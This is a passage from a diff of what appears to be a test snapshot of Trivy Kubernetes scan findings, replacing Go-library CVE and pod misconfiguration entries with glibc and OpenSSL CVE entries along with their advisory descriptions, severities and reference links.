"https://sourceware.org/bugzilla/show_bug.cgi?id=28011", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5699-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23218", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/security/cve/CVE-2022-23218", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "https://linux.oracle.com/cve/CVE-2022-23218.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-23218", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://access.redhat.com/security/cve/CVE-2022-23218", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-28948", - "installedVersion": "v3.0.0-20210107192922-496545a6307b", - "packageName": "gopkg.in/yaml.v3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23219", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-28948", - "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", - "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", - "https://github.com/go-yaml/yaml/issues/666", - "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", - "https://security.netapp.com/advisory/ntap-20220923-0006/", - "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "https://access.redhat.com/security/cve/CVE-2022-23219", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "https://linux.oracle.com/cve/CVE-2022-23219.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "crash when attempting to deserialize invalid input", + "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-28948", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-28948", + "value": "https://avd.aquasec.com/nvd/cve-2022-23219", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "value": "https://access.redhat.com/security/cve/CVE-2022-23219", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/issues/666", + "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kindnet-cni' of DaemonSet 'kindnet' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(DaemonSet 'kindnet' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", @@ -98064,13724 +99898,11682 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1751", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", + "https://access.redhat.com/security/cve/CVE-2020-1751", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "https://linux.oracle.com/cve/CVE-2020-1751.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200430-0002/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1751", ], }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsNonRoot' to true)", + "category": "Vulnerability", + "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: array overflow in backtrace functions for powerpc", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://avd.aquasec.com/nvd/cve-2020-1751", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://access.redhat.com/security/cve/CVE-2020-1751", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV022", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv022", - ], - }, - "category": "Misconfiguration", - "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", - "name": "Non-default capabilities added(Container 'kindnet-cni' of DaemonSet 'kindnet' should not set 'securityContext.capabilities.add')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv022", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(DaemonSet 'kindnet' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1752", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", + "https://access.redhat.com/security/cve/CVE-2020-1752", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "https://linux.oracle.com/cve/CVE-2020-1752.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "https://security.gentoo.org/glsa/202101-20", + "https://security.netapp.com/advisory/ntap-20200511-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1752", ], }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "category": "Vulnerability", + "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: use-after-free in glob() function when expanding ~user", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://avd.aquasec.com/nvd/cve-2020-1752", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/security/cve/CVE-2020-1752", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "3.1.1-r0", - "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2023-2650", - "installedVersion": "3.1.0-r4", - "packageName": "libcrypto3", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", - ], - }, - "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", }, { "type": "URL", - 